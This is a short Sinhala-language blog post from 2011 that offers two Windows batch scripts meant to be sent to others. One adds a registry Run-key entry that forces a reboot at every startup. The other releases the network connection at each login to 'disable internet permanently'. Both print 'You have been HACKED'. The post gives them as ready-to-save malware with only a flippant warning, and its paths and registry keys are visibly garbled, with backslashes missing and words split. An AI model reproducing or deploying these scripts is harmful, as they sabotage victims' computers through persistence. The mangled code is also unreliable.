෴...සයිබර් විකාරය..෴

අල ගෙඩි වගේ මොළ ගෙඩි වලට හරවත් රසවත් විරාමයක්...

Subscribe
Add to Technorati Favourites
Add to del.icio.us
Saturday, March 26, 2011

Batch file programme

ලිවුවේ Unknown

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

Shutdown computer every time it is turned on
(save as name.bat)

____________________________________________________________________

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Disable internet permanently
(save as name.bat)


 Warning :

dont end up messing ur own computer

0 අදහස් උදහස්:

Post a Comment